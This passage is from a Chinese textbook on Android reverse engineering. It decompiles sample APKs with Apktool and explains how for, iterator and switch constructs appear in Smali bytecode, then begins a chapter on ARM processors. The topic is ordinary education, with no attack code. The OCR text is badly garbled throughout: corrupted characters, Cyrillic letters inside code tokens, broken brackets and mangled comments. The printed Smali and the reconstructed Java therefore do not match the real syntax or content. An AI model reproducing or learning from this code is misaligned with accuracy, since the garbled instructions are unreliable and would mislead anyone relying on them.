invoke-direct {p0}, Lcom/guan/xunhuan/MainActivity;->forxunhuan()V 


line 26 
invoke-direct {p0}, Lcom/guan/xunhuan/MainActivity;->whilexunhuan()V 


line 27 
invoke-direct {p0}, Lcom/guan/xunhuan/MainActivity;->dowhilexunhuan()V 


line 28 
return-void 
.end method 
.method public onCreateOptionsMenu(Landroid/view/Menu;)Z 


e. 
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locals 2 
.parameter "menu" 


.prologue 
ine 91 
invoke-virtual {p0}, Lcom/guan/xunhuan/MainActivity;-» getMenulnflater()Landroid/view/Menulnflater; 


move-result-object vO 
const/high16 v1, 0x7f07 
invoke-virtual (v0, v1, p1}, Landroid/view/Menulnflater;-»inflate(ILandroid/view/Menu;)V 


ine 92 
const/4 v0, Ox1 


return vO 
.end method 
其 中 对 方法 iterator0) 的 具体 分 析 如 下 所 示 。 
.method private iterator()V 
locals 7 
.prologue 
line 34 
const-string v4, "activity" 
invoke-virtual (pO, v4}, Lcom/guan/xunhuan/MainActivity;-> 
getSystemService 
(Ljava/lang/String;)Ljava/lang/Object; ##&HR ActivityManager 
move-result-object vO 
check-cast v0, Landroid/app/ActivityManager; 
Ліпе 35 
local vO, activityManager:Landroid/app/ActivityManager; 
invoke-virtual (v0), Landroid/app/ActivityManager;-»getRunningAppProcesses() 
Ljava/util/List; 
move-result-object v2.  # 正 在 运行 的 进程 列表 
line 36 
local v2, psinfos:Ljava/util/List;, 
"Ljava/util/List«Landroid/app/ActivityManager$RunningAppProcesslnfo;»;" 
new-instance v3, Ljava/lang/StringBuilder;，# 新 建 一 个 StringBuilder 对 象 
invoke-direct (v3), Ljava/lang/StringBuilder;-><init>()V # 调 用 StringBuilder 构造 函数 
line 37 
Лоса! v3, sb:Ljava/lang/StringBuilder; 
invoke-interface (v2), Ljava/util/List;->iterator()Ljava/util/Iterator; 
# 获 取 进 程 列 表 的 迭代 器 
move-result-object v4 
:goto_0 # 迁 代 循环 开始 
invoke-interface (v4), Ljava/util/Iterator;-»hasNext()Z # 开 始 迭 代 
move-result v5 
if-nez v5,:cond O ”# 如 果 和 迭代 器 不 为 空 就 跳 走 
line 40 
invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/ 
String; 
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move-result-object v4 #StringBuilder 转 为 字符 串 

const/4 v5, 0x0 

invoke-static (pO, v4, v5), Landroid/widget/Toast;-»makeText 

(Landroid/content/Context;Ljava/lang/CharSequence;l)Landroid/ 
widget/Toast; 

move-result-object v4 

invoke-virtual (v4), Landroid/widget/Toast;-»show()V # 弹 出 StringBuilder HAZ 

Jine 41 

retum-void # 方 法 返回 

Jine 37 

:cond 0 

invoke-interface (v4), Ljava/util/Iterator;->next()Ljava/lang/Object; 

# 循 环 获取 每 一 项 

move-result-object v1 

check-cast v1, Landroid/app/ActivityManager$RunningAppProcessinfo; 

Jine 38 

Јоса! v1, info:Landroid/app/ActivityManager$RunningAppProcessinfo; 

new-instance v5, Ljava/lang/StringBuilder; # 新 建 一 个 临时 的 StringBuilder 

iget-object v6, v1, Landroid/app/Activity Manager$RunningAppProcesslnfo; 
-»processName:Ljava/lang/String; ХЕ АНЕ 

invoke-static (v6), Ljava/lang/String;->valueOf(Ljava/lang/Object;) 

Ljava/lang/String; 

move-result-object v6 

invoke-direct (v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/ 

String;)V 

const/16 v6, Oxa # 换 行 符 

invoke-virtual (v5, v6), Ljava/lang/StringBuilder;->append(C)Ljava/ 

lang/StringBuilder; 

move-result-object v5 # 组 合 进程 名 与 换行 符 

invoke-virtual (v5), Ljava/lang/StringBuilder;->toString()Ljava/lang/ 

String; 

move-result-object v5 

invoke-virtual (v3, v5), Ljava/lang/StringBuilder; # 将 组 合 后 的 字符 串 添加 到 StringBuilder ЖЕ 
->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 

goto:goto O ”# 跳 转 到 循环 开始 处 

.end method 

上 述 代码 的 功能 是 获取 正在 运行 的 进程 列表 , 并 使 用 Toast 提示 弹出 所 有 的 进程 名 , 具体 说 明 如 下 所 示 。 

О 使 用 类 ActivityManager 中 的 方法 getRunningAppProcesses() 获 取 正在 运行 的 进程 列表 功能 ， 此 方法 会 
返回 一 个 List< RunningAppProcessInfo> 对 象 。 

口 调用 了 List 中 的 方法 iterator() 获 取 进 程 列表 的 迭代 器 ， 从 标号 goto_0 开始 进入 迭代 循环 。 

О 在 循环 中 先 调用 迭代 器 方法 hasNextO 检 测 和 迭代 器 是 否 为 室 ， 如 果 迭 代 器 为 空 则 调用 Toast 提 示 弹 出 
所 有 进程 信息 。 如果 不 为 空 则 说 明和 迭代 器 中 的 内 容 还 没有 取 完 , 此 时 需要 调用 迭代 器 中 的 方法 next() 
获取 单个 RunningAppProcessInfo 对 象 。 

О 新 建 一 个 临时 的 StringBuilder， 将 “进程 名 和 换行 符 ” 组 合 添加 到 循环 开始 前 创建 的 StringBuilder 中 。 

О 最 后 调用 goto 语 句 跳 转 到 循环 体 的 开始 处 。 

通过 上 述 代码 可 知 ， 和 迭代 器 循环 会 调用 和 迭代 器 方法 hasNext() 来 检测 是 否 满 足 循环 条 件 。 通 过 在 迭代 器 

循环 中 调用 迭代 器 方法 nextO 的 方式 可 以 获取 单个 具体 对 象 .在 循环 中 可 以 使 用 指令 goto 来 控制 代码 的 运作 
流程 。 在 整个 循环 中 展开 ，for 形式 的 迭代 器 循环 后 就 会 变 为 while 形式 的 迭代 器 循环 。 


@ 
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继续 分 析 文 件 MainActivity.smali, (F for 循环 方法 forXunhuan() 的 实现 代码 如 下 所 示 。 
.method private forXunhuan()V 

locals 8 

.prologue 

line 47 

invoke-virtual {p0}, Lcom/guan/xunhuan/MainActivity;- 
>getApplicationContext()Landroid/content/Context; 

move-result-object v6 

invoke-virtual {v6}, Landroid/content/Context; # 获 取 PackageManager 
->getPackageManager()Landroid/content/pm/PackageManager; 

move-result-object v3 

Jine 49 

„local v3, pm:Landroid/content/pm/PackageManager; 

const/16 v6, 0x2000 

Jine 48 

invoke-virtual (v3, v6), Landroid/content/pm/PackageManager; 
-»getinstalledApplications(I)Ljava/util/List; # 获 取 已 安装 的 程序 列表 

move-result-object vO 

line 50 

local vO, appInfos:Ljava/util/List;,"Ljava/util/List<Landroid/content/pm 

/ApplicationInfo;>;" 

invoke-interface {v0}, Ljava/util/List;->size()l # 获 取 列 表 中 ApplicationInfo 

对 象 的 个 数 

move-result v5 

Jine 51 

local v5, size:l 

new-instance v4, Ljava/lang/StringBuilder; # 新 建 一 个 StringBuilder 对 象 

invoke-direct (v4), Ljava/lang/StringBuilder;-><init>()V #99 StringBuilder 的 构造 函数 

ine 52 

.local v4, sb:Ljava/lang/StringBuilder; 

const/4 v1, 0x0 


local v1, i:l # 初 始 化 v1 为 0 

:goto_0# 循 环 开始 

if-it v4, v5, :cond_0 ”的 0 果 v1 小 于 v5， 则 跳 转 到 сопа 0 标号 位 置 

line 56 

invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/ 

lang/String; 

move-result-object v6 

const/4 v7, 0x0 

invoke-static (pO, v6, v7}, Landroid/widget/Toast; #4 构造 Toast 
->makeText(Landroid/content/Context;Ljava/lang/CharSequence;l) 


Landroid/widget/Toast; 
move-result-object v6 
invoke-virtual {v6}, Landroid/widget/Toast;->show()V # 显 示 已 安装 的 程序 列表 
line 57 
retum-void # 方 法 返回 
ine 53 
:cond 0 
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invoke-interface (vO, v1), Ljava/util/List;->get(I)Ljava/lang/Object; 

# 单 个 Applicationlnfo 

move-result-object v2 

check-cast v2, Landroid/content/pm/ApplicationInfo; 

ine 54 

-local v2, info:Landroid/content/pm/ApplicationInfo; 

new-instance v6, Ljava/lang/StringBuilder;”# 新 建 一 个 临时 StringBuilder 对 象 

iget-object v7, v2, Landroid/content/pm/ApplicationInfo;->packageName: 

Ljava/lang/String; 

invoke-static {v7}, Ljava/lang/String;-»valueOf(Ljava/lang/Object; ) 

Ljava/lang/String; 

move-result-object v7 #8% 

invoke-direct (v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/ 

String;)V 

const/16 v7, Oxa # 换 行 符 

invoke-virtual (v6, v7}, Ljava/lang/StringBuilder;->append(C)Ljava/ 

lang/StringBuilder; 

move-result-object v6 #H#A82 Sik 

invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang 

/String; HRA LH B 

move-result-object v6 

invoke-virtual (v4, v6}, Ljava/lang/StringBuilder;- 
»append(Ljava/lang/String;)Ljava/lang/StringBuilder; #18250 StringBuilder 中 

ine 52 

add-int/lit8 v1, v1, 0x1 # 下 一 个 索引 

goto :goto_0 # 跳 转 到 循环 起 始 处 


.end method 
上 述 代码 的 功能 是 获取 所 有 安装 的 程序 ， 然 后 使 用 Toast 提示 弹出 所 有 的 软件 包 名 ， 其 具体 功能 如 
下 所 示 。 


а 使 用 类 PackageManager 中 的 方法 getInstalledApplications0 获 取 所 有 的 安装 程序 。 

O 先 创建 一 个 StringBuilder 对 象 以 保存 所 有 的 字符 串 信 息 ， 然 后 初始 化 v1 寄存 器 为 0 作为 获取 列表 项 
的 索引 。 

О for 循 环 的 起 始 位 置 是 goto_0 标 号 ,循环 条 件 的 代码 是 “if-lt v1, v5, :cond_0 ”， 其 中 v1 表示 索引 值 ， 
v5 表示 列表 中 ApplicationInfo 的 个 数 ， 使 用 cond_0 标号 位 置 的 代码 表示 循环 体 。 如 果 没 有 索引 标 
注 在 最 后 一 项 ， 则 所 有 的 代码 都 会 跳 转 到 cond_0 标号 的 位 置 处 执行 。 

а 如 果 全 部 索引 完毕 ， 上 述 代码 会 顺序 执行 Toast 提 示 以 显示 所 有 的 字符 串 信 息 。 使 用 cond_0 标 号 位 
置 的 第 一 行 代 码 会 调用 List 中 的 方法 get0 获 取 列 表 中 的 单个 ApplicationInfo 对 象 ， 然 后 对 包 名 和 换 
行 符 进 行 组 合 处 理 ， 并 将 组 合 结果 添加 到 先前 声明 的 StringBuilder 中 。 

а 将 v1 索引 值 加 1， 然 后 调用 “goto :goto 0” 语句 跳 转 到 循环 的 起 始 位 置 。 

通过 对 上 述 循 环 代码 的 分 析 可 知 ， 在 进入 循环 前 需要 先 初始 化 循环 计数 器 的 变量 ， 并 且 需 要 在 循环 体 
中 更 改 它 的 值 。 在 循环 中 可 以 使 用 指令 goto 来 控制 代码 的 运作 流程 。 

对 于 while 循环 和 do while 循环 来 说 , 两 者 的 结构 基本 相同 , 只 是 循环 条 件 的 判断 位 置 不 同 。 在 Android 
程序 中 ，while 循环 和 do while 循环 的 代码 与 前 面 介 绍 的 迭代 器 循环 代码 类 似 ， 具 体 过 程 读 者 可 以 参阅 本 实 
例 反 编译 后 的 文件 MainActivity.smali， 里 面 的 方法 whileXunhuan() 771; dowhileXunhuan0) 演 示 了 这 两 个 循 
环 的 详细 运作 过 程 。 


e 
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ES 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 15 章 \ 分 析 switch 语句 .avi 


| BB | 目的 | 源码 路 径 
| 分 析 switch 语句 光盘 :daima\1S\switchca 


在 本 节 的 内 容 中 ， 将 详细 讲解 本 实例 的 具体 实现 流程。 
15.2.1 创建 Android 工程 


(1) 打开 Eclipse， 新 建 一 个 Android 4.4 项 目 工程 ， 工 程 名 命名 为 switchca， 目 录 结 构 如 图 15-4 所 示 。 
(2) 使 用 Eclipse 工具 进行 编译 签名 操作 ， 获 取 APK 文件 ， 如 图 15-5 所 示 。 


I8 Package Explorer 23 em 
n 7 
aw 
日 -中 sre 
E- com. guan. swi tcheca 


由 - 国 Maindctivity. java 
5-08 gen [Generated Java Files] 


Ф Ezport Androi ication = 
@-Щ con. guan. svi ches. = Dl xi 
BJ BÀ Android 4.4 Project Checks 
ËJ BÀ Android Private Libraries Performs a set of checks to make sure the application can be exported 
D assets 
iG. 
ae iu Select the project to export. 
EIE 一 一 一 
8-55 res Project: [witches Proves... 
88-05 drevable-hépi Wo errors found. Click Next, 


19-05 drawable-ldpi 
由 -车 drawable-mdpi 
H-S drawable-xhdpi 
H- layout 
H- menu 
6-6 values 
0) dimens. xml 
回 strings. xml 
C] styles. xml 
由 -对 values-large N 
回 Androi dhani fest. xml 
E) ie Launcher-reb. png 


D switches 
国 proguard-project. txt @ Back Finish Cancel 
| N № switche k 
В) project. properties WP sei tohia ар 


图 15-4 Android 工程 的 目录 结构 图 15-5 获取 APK 文件 


G) 使 用 工具 对 获取 的 АРК 文件 进行 反 编 译 工作 ， 将 反 编 译 后 获取 的 文件 保存 在 “ 反 编 译 后 的 ” 目 
录 中 ， 如 图 15-6 所 示 。 


b res 2014/2/23 18:04 文件 来 
b smali 2014/2/23 18:04 文件 夹 
@ AndroidManifest. xml 2012/11/12 19:38 XML 文档 1K 
|_| apktool. yml 2012/11/12 19:38 ҮШ 文件 1 


15-6 “ 反 编 译 后 的 ”目录 
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15.2.2 分析 Smali 文件 中 的 switch 语句 


在 Android 应 用 程序 中 ， 也 经 常 使 用 switch 语句 实现 比较 常见 的 语句 结构 。 接 下 来 使 用 Apktool 工具 反 
编译 本 实例 的 АРК 文件 ， 打 开 反 编译 后 工程 目录 中 的 smali/com/guan/switchca/MainActivity.smali 文件 ， 具 
体 实 现代 码 如 下 所 示 。 

.class public Lcom/guan/switchca/MainActivity; 

.super Landroid/app/Activity; 

.source "MainActivity.java" 


# direct methods 
.method public constructor <init>()V 
locals 0 


.prologue 
line 8 
invoke-direct {p0}, Landroid/app/Activity;-><init>()V 


return-void 
.end method 


.method private packedSwitch(l)Ljava/lang/String; 
locals 1 
.parameter "i" 


.prologue 
ine 21 
const/4 v0, 0x0 


ine 22 
local vO, str:Ljava/lang/String; 
packed-switch p1, :pswitch data 0 


Jine 36 
const-string vO, "she is a person" 


line 39 
:goto 0 
return-object м0 


line 24 
:pswitch 0 
const-string v0, "she is a baby" 


line 25 
goto :goto 0 


line 27 
:pswitch 1 
const-string vO, "she is a girl" 
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ine 28 
goto :goto 0 


ine 30 
:pswitch 2 
const-string vO, "she is a woman" 


Ліпе 31 
goto :goto 0 


Jine 33 
:pswitch_3 
const-string v0, "she is an obasan" 


line 34 
goto :goto 0 


ine 22 
nop 


:pswitch data 0 
.packed-switch 0x0 
:pswitch 0 
:pswitch 1 
:pswitch 2 
:pswitch 3 
.end packed-switch 
.end method 


-method private sparseSwitch(|)Ljava/lang/String; 
locals 1 
.parameter "age" 


.ргоіодие 
line 43 
const/4 v0, 0x0 


line 44 
local vO, str:Ljava/lang/String; 
sparse-switch p1, :sswitch data 0 


line 58 
const-string v0, "he is a person" 


Jine 61 
:goto 0 
return-object vO 


line 46 
:Sswitch 0 
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const-string v0, "he is a baby" 


Jine 47 
goto :goto 0 


line 49 
:sswitch 1 
const-string vO, "he is a student" 


line 50 
goto :goto 0 


Jine 52 
:sswitch_2 
const-string vO, "he is a father" 


line 53 
goto :goto 0 


Jine 55 
:Sswitch З 
const-string vO, "he is a grandpa" 


line 56 
goto :goto 0 


line 44 
nop 


:Sswitch data 0 
-Sparse-switch 
0x5 -> :sswitch 0 
Oxf -> :sswitch_1 
0x23 -> :sswitch_2 
0x41 -> :sswitch 3 
.end sparse-switch 
.end method 


# virtual methods 
-method public onCreate(Landroid/os/Bundle;)V 


locals 4 
.parameter "savedinstanceState" 


.prologue 
const/4 v3, 0x0 


line 12 
invoke-super (pO, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V 


line 13 


e. 
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const/high 16 v2, 0x7f03 
invoke-virtual (pO, v2), Lcom/guan/switchca/MainActivity;->setContentView(I)V 


line 14 
const/4 v2, 0х1 


invoke-direct (pO, v2), Lcom/guan/switchca/MainActivity;->packedSwitch(I)Ljava/lang/String; 

move-result-object vO 

Jine 15 

local vO, str1:Ljava/lang/String; 

invoke-static (pO, vO, v3}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 

move-result-object v2 


invoke-virtual (v2), Landroid/widget/Toast;->show()V 


line 16 
const/16 v2, 0x23 


invoke-direct (pO, v2), Lcom/guan/switchca/MainActivity;-»sparseSwitch(I)Ljava/lang/String; 
move-result-object v1 
line 17 
local v1, str2:Ljava/lang/String; 
invoke-static (pO, v1, v3}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 
move-result-object v2 
invoke-virtual (v2), Landroid/widget/Toast;->show()V 
line 18 
return-void 
.end method 
.method public onCreateOptionsMenu(Landroid/view/Menu;)Z 


locals 2 
parameter "menu" 


.prologue 
line 66 
invoke-virtual {p0}, Lcom/guan/switchca/MainActivity;-»getMenulnflater()Landroid/view/Menulnflater; 


move-result-object vO 


const/high16 v1, 0x7f07 
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invoke-virtual (v0, v1, p1}, Landroid/view/Menulnflater;-»inflate(ILandroid/view/Menu;)V 


ine 67 
const/4 v0, 0х1 


return vO 
.end method 
其 中 对 方法 packedSwitch() 的 具体 分 析 如 下 所 示 。 
.method private packedSwitch(I)Ljava/lang/String; 
locals 1 
.parameter "i" 
.prologue 
Ліпе 21 
const/4 v0, 0х0 
line 22 
local vO, str:Ljava/lang/String; #v0 为 字符 串 ，0 表示 null 
packed-switch p1, :pswitch data 0 #packed-switch 分 支 ，pswitch_data_0 指定 case 区 域 


line 36 

const-string vO, "she is a person" #default 分 支 
line 39 

:goto 0 # 所 有 case 的 出 口 

return-object v0 #5 [5152278 v0 

line 24 


:pswitch 0 #case 0 
const-string vO, "she is a baby" 
ine 25 
goto:goto O #9] goto_0 标号 位 置 
ine 27 
:pswitch 1 #case 1 
const-string vO, "she is a girl" 
line 28 
goto:goto O #9] goto 0 标号 位 置 
line 30 
:pswitch 2 #case 2 
const-string vO, "she is a woman" 
Ліпе 31 
goto:goto O #9] goto O 标号 位 置 
ine 33 
:pswitch З #case 3 
const-string v0, "she is an obasan" 
line 34 
goto :goto_0”# 跳 转 到 goto O 标号 位 置 
ine 22 
nop 
:pswitch data 0 
.packed-switch 0х0 #саѕе 区 域 ， 从 0 开始 ， 依 次 递增 
:pswitch 0 #саѕе 0 
:pswitch 1 #case 1 
:pswitch 2 #саѕе 2 
:pswitch З #саѕе 3 


e 
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.end packed-switch 
.end method 
在 上 述 代 码 中 ，switch 语句 中 用 到 了 packed-switch #84, FH, pl 表示 传递 进来 的 int 类 型 的 数值 ， 
pswitch data 0 表示 case 区 域 。 在 case 代码 块 中 ， 第 一 条 指令 .packed-switch 设置 的 比较 初始 值 为 0 ， 
pswitch 0、pswitch 1、pswitch 2 和 pswitch 3 分 别 表示 比较 结果 为 case 0 到 case 3 时 要 跳 转 到 的 地 址 。 标 
号 的 命名 格式 都 采用 了 pswitch 标识， 而 后 面 的 数值 表示 case 分 支 需要 判断 的 值 ， 并 且 其 值 依次 递增 。 在 
标号 位 置 的 实现 代码 中 ， 每 个 标号 位 置 都 会 使 用 v0 寄存 器 来 初始 化 一 个 字符 串 ， 然 后 跳 转 到 了 goto 0 标 
号 的 位 置 ， 因 为 goto_0 是 所 有 的 case 分 支 的 出 口 。 在 .packed-switch 区 域 设 置 了 4 条 case 分 支 ， 没有 被 
判断 的 default 分 支 会 在 packed-switch 指令 后 面 给 出 处 理 方式 。 指 令 packed-switch 在 Dalvik VM 中 的 语法 格 
式 如 下 所 示 。 
packed-switch vAA, +BBBBBBBB 
指令 后 面 的 +BBBBBBBB 被 指明 为 一 个 packed-switch-payload 类 型 的 偏 移 ， 其 语法 格式 如 下 所 示 。 
struct packed-switch-payload { 
ushortident; /* 值 固定 为 0x0100 */ 
ushort size; /* саѕе 数目 */ 
int first_key; /* 初始 case 的 值 */ 
int[] targets; /* 每 个 case 相对 switch 指令 处 的 偏 移 */ 


Е 
可 以 查找 到 packed-switch pl, :pswitch data 0 指令 位 于 0x2cbla ЖЕ, 与 之 对 应 的 机 器 码 为 2B 02 13 00 00 00, 
各 个 机 器 码 的 具体 说 明 如 下 所 示 。 
口 2B: 表示 packed-switch 的 OpCode。 
O 02: 表示 寄存 器 p1。 
Q 00000013: 表示 偏 移 量 0x13。 
到 此 为 止 ， 规 律 递增 的 switch 语句 全 部 分 析 完 毕 ， 这 段 Smali 代码 如 下 所 示 。 
private String packedSwitch(int i) ( 
String str = null; 
switch (i) ( 
case 0: 
str = "she is a aaa"; 
break; 
case 1: 
str = "she is a bbb"; 
break; 
case 2: 
str = "she is a ccc"; 
break; 
case 3: 
str = "she is an ddd"; 
break; 
default: 
str = "she is a eee"; 
break; 
} 


return str; 


} 
接 下 来 开始 分 析 无 规律 case 语句 代码 部 分 ,在 文件 MainActivity.smali 中 找到 方法 sparseSwitch(), HH. 


体 实现 代码 如 下 所 示 。 
© 
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.method private sparseSwitch(I)Ljava/lang/String; 
locals 1 
.parameter "age" 
.prologue 
Jine 43 
const/4 vO, 0x0 
line 44 
Лоса! vO, str:Ljava/lang/String; 
sparse-switch p1, :sswitch data O #sparse-switch 4 xz, sswitch data 0 
指定 case 区 域 
line 58 
const-string vO, "he is a person" #case default 
line 61 
:goto 0 #саѕе HO 
retum-object v0 ”的 反 回 字符 串 
Jine 46 
:Sswitch 0 #case5 
const-string v0, "he is a baby" 
line 47 
goto :goto 0 # 跳 转 到 goto 0 标号 位 置 
line 49 
:Sswitch 1 #case 15 
const-string vO, "he is a student" 
Jine 50 
goto :goto 0 # 跳 转 到 goto 0 标号 位 置 
ine 52 
:sswitch_2 #case 35 
const-string v0, "he is a father" 
‘line 53 
goto :goto_0 # 跳 转 到 goto_0 标号 位 置 
line 55 
:Sswitch 3 #case 65 
const-string v0, "he is a grandpa" 


line 56 

goto :goto_0# 跳 转 到 goto 0 标号 位 置 

Ліпе 44 

nop 

:Sswitch data 0 

.sparse-switch #case 区 域 
0x5 -> :sswitch_0 #case 5(0x5) 
Oxf -> :sswitch 1 #case 15(0xf) 
0x23 -> :sswitch 2 #case 35(0x23) 
0x41 -> :sswitch 3 #case 65(0x41) 

.end sparse-switch 

.end method 


在 上 述 switch 语句 代码 中 使 用 了 sparse-switch 指令 ， 指 令 .sparse-switch 没有 给 出 case 的 具体 初始 值 ， 
所 有 的 case 值 都 使 用 “case 值 -> case 标号 ”的 形式 给 出 。 在 上 述 代 码 中 一 共有 4 个 case， 功 能 都 是 构造 一 
个 字符 串 并 跳 转 到 goto_0 标号 的 位 置 ， 这 部 分 的 代码 架构 与 packed-switch 方式 的 switch 语句 一 样 。 

在 Dalvik VM 中 ， 指 令 sparse-switch 的 语法 格式 如 下 所 示 。 

sparse-switch vAA, +BBBBBBBB 


@ 
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指令 sparse-switch 后 面 的 +BBBBBBBB 被 指明 为 一 个 sparse-switch-payload 格式 的 偏 移 ， 其 语法 格式 
如 下 所 示 。 
struct sparse-s witch-payload { 
ushort ident; MAREEA 0x0200*/ 
ushortsize; /*саѕе 数目 */ 
in[]keys; — /*&^ case 的 值 ， 顺 序 从 低 到 高 
int[] targets; ”每 个 case 相对 switch 指令 处 的 偏 移 */ 
y 
可 以 查找 到 指令 sparse-switch pl, :sswitch data 0 位 于 0x2cb6a 处 ， 与 之 对 应 的 机 器 码 是 2C 02 13 00 00 00, 
各 个 机 器 码 的 具体 说 明 如 下 所 示 。 
口 2C: 表示 sparse -switch 的 OpCode。 
O 02: 表示 寄存 器 pl1。 
口 00000013: 表示 偏 移 量 0x13。 
指令 “sparse-switch pl, :sswitch_data 0” 指 向 结构 体 sparse-switch-payload 的 偏 移 量 为 : 
Ox2cb6a + 2* 0x13 = 0x2cb90 
第 1 个 ident 字段 : 是 0x200， 标 识 sparse-switch 有 效 的 case 区 域 。 
第 2 个 字段 : size 为 4， 表 明 有 4 个 case。 
第 3 个 字段 : keys 为 4 个 case 的 值 ， 分 别 为 0x5、0xf、0x23 和 0x41。 
第 4 个 字段 : 分 别 为 偏 移 量 0x6、0x9、0xc、0xf， 根 据 sparse-switch 指令 的 偏 移 值 0x2cb6a， 可 以 
得 到 case 0- case 3 的 位 置 ， 具 体 说 明 如 下 所 示 。 
> case 0 位 置 = 0x2cbóa + 2 * 0x6 = 0x2cb76 
> case l 位 置 = 0x2cbóa + 2 * 0х9 = 0x2cb7c 
> case 2 位 置 = 0x2cbóa + 2 * 0xc = 0x2cb82 
> case 3 位 置 —0x2cb6a + 2 * Oxf = 0x2cb88 


将 上 述 无 规律 switch 的 Smali 代码 进行 整理 ，Java 代码 如 下 所 示 。 
private String sparseSwitch(int age) ( 
String str = null; 
switch (age) ( 
case 5: 
str = "he is a aaa"; 
break; 
case 15: 
str = "he is a bbb"; 
break; 
case 35: 
str = "he is a ccc"; 
break; 
case 65: 
str = "he is a ddd"; 
break; 
default: 
str = "he is a eee"; 
break; 


осоо 


} 


return str; 


第 16 章 ”ARM 汇编 逆向 分 析 


Android 应 用 程序 是 用 Java 语言 编写 的 ，Java 通过 代码 混淆 技术 来 提高 安全 性 ， 通 过 更 改 方法 名 、 添 加 
字段 的 方式 来 增加 静态 分 析 的 难度 ， 从 而 达到 防止 被 破解 的 目的 。Android 为 了 进一步 提高 程序 的 安全 性 ， 
推出 了 Android МОК 机 制 ， 这 样 可 以 通过 C 和 C++ 语言 来 编写 程序 的 核心 功能 代码 ， 编 译 这 些 代码 后 会 生 
成 基于 特定 处 理 器 的 可 执行 文件 。 在 移动 设备 中 ， 绝 大 多 数 的 处 理 器 都 是 ARM 处 理 器 ,编译 程序 后 会 生成 
ARM elf 可 执行 文件 。 在 分 析 这 些 可 执行 文件 时 ， 需 要 用 到 ARM 汇编 的 知识 。 本 章 将 详细 讲解 ARM 汇编 
的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


16.1 ARM 处 理 器 概述 
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ARM (Advanced RISC Machines) 既 可 以 认为 是 一 个 公司 的 名 字 , 也 可 以 认为 是 对 一 类 微 处 理 器 的 统称 ， 
还 可 以 认为 是 一 种 技术 的 名 字 。1991 年 ARM 公司 成 立 于 英国 剑桥 ， 主 要 出 售 芯 片 设 计 技 术 的 授权 。 目 前 ， 
采用 ARM 技术 知识 产权 (Р) 核 的 微 处 理 器 ， 即 通常 所 说 的 ARM 微 处 理 器 ， 已 遍及 工业 控制 、 消 费 类 电 
子 产 品 、 通 信 系 统 、 网 络 系统 、 无 线 系统 等 各 类 产品 市 场 ， 基 于 ARM 技术 的 微 处 理 器 应 用 约 占据 了 32 位 
RISC 微 处 理 器 75% 以 上 的 市 场 份额 ，ARM 技术 正在 逐步 渗入 到 日 常生 活 的 各 个 方面 。 


16.1.1 ARM 基础 


ARM 公司 是 专门 从 事 基 于 RISC 技术 芯片 设计 开发 的 公司 ， 作 为 知识 产权 供应 商 ， 本 身 不 直接 从 事 芯 
片 生 产 ， 靠 转让 设计 许可 由 合作 公司 生产 各 具 特 色 的 芯片 ， 世 界 各 大 半导体 生产 商 从 ARM 公司 购买 其 设计 
的 ARM 微 处理 器 核 ， 根 据 各 自 不 同 的 应 用 领域 ， 加 入 适当 的 外 围 电路 ， 从 而 形成 自己 的 ARM 微 处 理 器 芯 
片 进入 市 场 。 目 前 ， 全 世界 有 几 十 家 大 的 半导体 公司 都 使 用 ARM 公司 的 授权 ， 因 此 婚 使 得 ARM 技术 获得 
更 多 的 第 三 方 工具 、 制 造 、 软 件 的 支持 ， 又 使 整个 系统 成 本 降低 ， 使 产品 更 容易 进入 市 场 被 消费 者 所 接受 ， 
更 具有 竞争 力 。 
到 目前 为 止 ARM 微 处 理 器 及 技术 的 应 用 几乎 已 经 深入 到 各 个 领域 。 
(1) 工业 控制 领域 ， 作 为 32 位 的 RISC 架构 ， 基 于 ARM 核 的 微 控制 器 芯片 不 但 占据 了 高 端 微 控制 器 
市 场 的 大 部 分 市 场 份额 ， 同 时 也 逐渐 向 低 端 微 控制 器 应 用 领域 扩展 ，ARM 微 控制 器 的 低 功 耗 、 高 性 价 比 ， 
向 传统 的 8 位 /16 位 微 控 制 器 提出 了 挑战 。 
(2) 无 线 通信 和 领域 :目前 已 有 超过 85% 的 无 线 通信 设备 采用 了 ARM BOR, ARM 以 其 高 性 能 和 低 成 本 ， 
在 该 领域 的 地 位 日 益 巩固 。 
GO 网 络 应 用 : 随 着 宽带 技术 的 推广 ， 采 用 ARM 技术 的 ADSL 芯片 正 逐 步 获 得 竞争 优势 。 此 外 ，ARM 
在 语音 及 视频 处 理 上 进行 了 优化 ， 并 获得 广泛 支持 ， 也 对 DSP 的 应 用 领域 提出 了 挑战 。 
(4) 消费 类 电子 产品 : ARM 技术 在 目前 流行 的 数字 音频 播放 器 、 数 字 机 项 盒 和 游戏 机 中 被 广泛 采用 。 
(5) 成 像 和 安全 产品 : 现在 流行 的 数码 相机 和 打印 机 中 绝 大 部 分 采用 ARM 技术 。 手 机 中 的 32 位 SIM 


智能 卡 也 采用 了 ARM 技术 。 

除 此 以 外 ，ARM 微 处 理 器 及 技术 还 应 用 到 许多 不 同 的 领域 ， 并 会 在 将 来 取得 更 加 广泛 的 应 用 。 

ARM 微 处 理 器 目前 包括 下 面 儿 个 系列 ， 以 及 其 他 厂商 基于 ARM 体系 结构 的 处 理 器 ， 除 了 具有 ARM 
体系 结构 的 共同 特点 以 外 ， 每 一 个 系列 的 ARM 微 处 理 器 都 有 各 自 的 特点 和 应 用 领域 。 


DODOCODDOU 


ARM7 系 列 

ARM9 系 列 
ARM9E 系 列 
ARMI10E 系 列 
SecurCore 系 列 
Inter 的 Xscale 
Inter 的 StrongARM 


其 中 ，ARM7、ARM9、ARM9E 和 ARMIOE 为 4 个 通用 处 理 器 系列 ， 每 一 个 系列 提供 一 套 相对 独特 的 
性 能 来 满足 不 同 应 用 领域 的 需求 。SecurCore 系列 专门 为 安全 要 求 较 高 的 应 用 而 设计 。 


16.1.2 ARM 处 理 器 的 特点 


